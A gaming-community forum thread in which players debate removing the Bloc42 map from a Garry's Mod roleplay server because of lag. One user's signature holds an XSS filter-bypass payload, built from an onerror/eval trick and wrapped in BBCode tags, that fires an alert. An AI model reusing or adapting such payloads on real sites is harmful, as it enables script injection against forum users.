Login to ZARP
Username: Password: Remember me

Poll: Remove Bloc42

Remove It 89 54.9%
Keep It 73 45.1%
Total number of voters: 162 ( Jamez, iFreshFruit, Xeronise, Patriot, ChikenGod ) See more
Only registered users can participate to this poll

TOPIC: [SSRP] Remove Bloc42

[SSRP] Remove Bloc42 8 years 1 month ago #289289

Simply lower the player cap on Server 2.

All these new explosive weapons will cause lag aswell but I doubt they will gt restricted for that Server/Map.
should be considered, the map is beautful.
  • Nexize
  • Legendary Member
  • ZARP VIP
  • I call myself Nexize but you can call me tonight
  • Thanks received: 1215
────────────────────────
My Animelist!
Steam!
The topic has been locked.

[SSRP] Remove Bloc42 8 years 1 month ago #289290

TheAp4ch3 wrote:
I like how everybodys hatin on exro as if he knew that it would crash even more than before. Thats the most dogshit thing i have heard all day.

Lets not jump to conclusions and wait till Fennsters fixed version will be added.

Without being rude because Tennessee is trying real hard to fix the map but the honest truth is fennsters version is far from fixed.
  • _Max
  • Former Community Manager
  • ZARP VIP
  • Sup
  • Thanks received: 1002

[SSRP] Remove Bloc42 8 years 1 month ago #289291

ParaMontana wrote:
Ace42 wrote:
The lag seems fixed for now, maybe you should give it a try now if you find your mouse in your big pile of salt?

thats because not alot of people were playing when this happened. and just wait till we start basing in the district see if that survives

We'll see how it all plays out, but using the first laggspike as an excuse to immediatly remove the map seems a little childish in my opinion. We all voted, Bloc42 won. So be it. No need to act like babies who didn't get the toy they wanted.
  • Ace
  • Expert Boarder
  • ZARP VIP Gold Badge
  • Lone Wolf
  • Thanks received: 334

Former TTT SA, SSRP Admin & TeamSpeak Staff

[SSRP] Remove Bloc42 8 years 1 month ago #289304

Nexize wrote:

All these new explosive weapons will cause lag aswell but I doubt they will gt restricted for that Server/Map.
Not going to happen.
  • EMP
  • Community Owner
  • ZARP VIP Golden Blue Badge
  • ZARP Owner/Developer
  • Thanks received: 3152

To Add me on Steam Click the Image Below!

The following user(s) said Thank You: vitx

[SSRP] Remove Bloc42 8 years 1 month ago #289305

Step One: Go as miner
Step Two: Stay in the dark, mining rubies forever
Step Three: Gems
Step Four: Money.
  • UltraBagel
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 61

[SSRP] Remove Bloc42 8 years 1 month ago #289306

Bloc42's a great map but of course the lag is an issue but when has it not been an issue on ZARP? I'm sure it will get optimized better soon but as it just changed expect it to have issues. The real problem is these shitty special weapons that fuck everything up.
  • topkek
  • Fresh Boarder

[SSRP] Remove Bloc42 8 years 1 month ago #289314

bloc42 is too small for Zarp SSRP 2
  • SkeletonWarrior
  • Diamond Boarder
  • ZARP VIP
  • A Pure Legend!
  • Thanks received: 1124

csontvazharcos
Former:
SSRP Super Administrator
TeamSpeak Staff
Forums Section Moderator

[SSRP] Remove Bloc42 8 years 1 month ago #289319

topkek wrote:
Bloc42's a great map but of course the lag is an issue but when has it not been an issue on ZARP? I'm sure it will get optimized better soon but as it just changed expect it to have issues. The real problem is these shitty special weapons that fuck everything up.

It's not going to get optimised.
  • _Max
  • ZARP VIP
  • Sup
  • Thanks received: 1002

[SSRP] Remove Bloc42 8 years 1 month ago #289321

EMP wrote:
Nexize wrote:

Not going to happen.
Oh great lord EMP
In the words of the great DCX "Fix it"
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

[SSRP] Remove Bloc42 8 years 1 month ago #289440

Ah well bye bye server 2 for now then..
  • Milankov
  • Senior Boarder
  • ZARP VIP
  • Birth of OVERPRICED
  • Thanks received: 48

[SSRP] Remove Bloc42 8 years 1 month ago #289449

UltraBagel wrote:
Step One: Go as miner
Step Two: Stay in the dark, mining rubies forever
Step Three: Gems
Step Four: Money.

Thanks for the solution, now lets all mine to get the fullest out of bloc.
  • Sonzy
  • Diamond Boarder
  • ZARP VIP
  • Thanks received: 570

Ex-Deathrun Moderator
Ex-SSRP Administrator
Ex-TTT Moderator
Ex-Minigames Moderator

"Perp advertiser"

[SSRP] Remove Bloc42 8 years 1 month ago #289452

I've been playing since it launched blok42 and the lag has been fine for me it's not a problem if you have a good connection other than a few server crashes but other than that fine block is amazing ( play before you vote don't want it please )
  • william286
  • Senior Boarder
  • ZARP VIP
  • Most Untrusted Player In The Zarp Community...
  • Thanks received: 51

[SSRP] Remove Bloc42 8 years 1 month ago #289455

It seems that the small district suffers from identical issues as the mines. Cookie monster really did a shit job when making this map.

• exrobite
  • Loyal Boarder
  • ZARP VIP Gold Badge
  • dont have a cow man
  • Thanks received: 2489
Last Edit: 8 years 1 month ago by exrobite.

[SSRP] Remove Bloc42 8 years 1 month ago #289456

Server isn't lagging currently, reason being that people don't play on it. I knew there would be a drop in players but I'm surprised how fast and how low the player count has dropped.
  • Legendary Soldier
  • ZARP VIP Gold Badge
  • Still alive bois
  • Thanks received: 1431
Former Community Manager - Current Bartender
Last Edit: 8 years 1 month ago by Legendary Soldier.

[SSRP] Remove Bloc42 8 years 1 month ago #289459

Tyler Durden wrote:
Server isn't lagging currently, reason being that people don't play on it. I knew there would be a drop in players but I'm surprised how fast and how low the player count has dropped.

we managed to base on the server with only 14 people online and it lagged so bad it was horrendous !!!
  • ParaMontana
  • User is blocked
  • ZARP VIP
  • Thanks received: 3172

[SSRP] Remove Bloc42 8 years 1 month ago #289460

ParaMontana wrote:
Tyler Durden wrote:

we managed to base on the server with only 14 people online and it lagged so bad it was horrendous !!!

That's because it's not the player count that lags it, it's building in the district. So how about you just stop it until the map changes so at least people can play.
  • exrobite
  • Loyal Boarder
  • ZARP VIP Gold Badge
  • dont have a cow man

[SSRP] Remove Bloc42 8 years 1 month ago #289465

Exrobite wrote:
ParaMontana wrote:
Tyler Durden wrote:

That's because it's not the player count that lags it, it's building in the district. So how about you just stop it until the map changes so at least people can play.

so your telling me im not supposed to try and have fun?
Tough luck bud. i did not vote for this map i voted for rockford. im gonna just try and adjust to bloc42.
so im basing with my gang and my friends because that is the only fun i can have in this laggy map
  • ParaMontana
  • User is blocked
  • ZARP VIP
Last Edit: 8 years 1 month ago by ParaMontana.

[SSRP] Remove Bloc42 8 years 1 month ago #289469

ParaMontana wrote:
Exrobite wrote:
ParaMontana wrote:
Tyler Durden wrote:

Tough luck bud. i did not vote for this map i voted for rockford. im gonna just try and adjust to bloc42.
so im basing with my gang and my friends because that is the only fun i can have in this laggy map

That is totally pathetic. This total disregard for the server shows how petty you are over your map choice. Instead of trying to prevent a proposed cause of the problem, you tell me that you do it because you can? What kind of HA are you? Just because you didn't vote for it doesn't mean you have to ruin the server for the few people that the lag hasn't driven away.

As a head admin it is your responsibility to ensure the server's health. There are other places to base in the short time you will have to play on the map, so use them instead of potentially causing the problem.
  • exrobite
  • Loyal Boarder
  • ZARP VIP Gold Badge
  • dont have a cow man

[SSRP] Remove Bloc42 8 years 1 month ago #289471

Exrobite wrote:
ParaMontana wrote:
Exrobite wrote:
ParaMontana wrote:
Tyler Durden wrote:

That is totally pathetic. This total disregard for the server shows how petty you are over your map choice. Instead of trying to prevent a proposed cause of the problem, you tell me that you do it because you can? What kind of HA are you? Just because you didn't vote for it doesn't mean you have to ruin the server for the few people that the lag hasn't driven away.

The district is gonna be used to base in . if i base in it or not. the whole a team already has my dupe and other gangs have build district dupe there already. what your telling me is that i should stop playing the game and thats just stupid.

Never had this problem in rockford.

IF you wish to discuss this please add me here:

steamcommunity.com/profiles/76561197990888117
  • ParaMontana
  • User is blocked
  • ZARP VIP
Last Edit: 8 years 1 month ago by ParaMontana.

[SSRP] Remove Bloc42 8 years 1 month ago #289472

ParaMontana wrote:
Exrobite wrote:
ParaMontana wrote:
Exrobite wrote:
ParaMontana wrote:
Tyler Durden wrote:

The district is gonna be used to base in . if i base in it or not. the whole a team already has my dupe and other gangs have build district dupe there already. what your telling me is that i should stop playing the game and thats just stupid.

Never had this problem in rockford.

Good for you, can you put your short sighted goals behind you and stop trying to justify your selfish actions? We get it, rockford will come, but you're immature actions in trying to justify your actions even with the knowledge it could be lagging the server only goes to show how petty you can be.

We should all be working together to find a solution, if that is changing the map, then fine, remove bloc. But what you're doing is not only wrong but goes against everything the staff team should stand for.
  • exrobite
  • Loyal Boarder
  • ZARP VIP Gold Badge
  • dont have a cow man
Moderators: MadMagic, Kanna.
Time to create page: 0.204 seconds

251 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
13/127
Connect to server View Gametracker Deathrun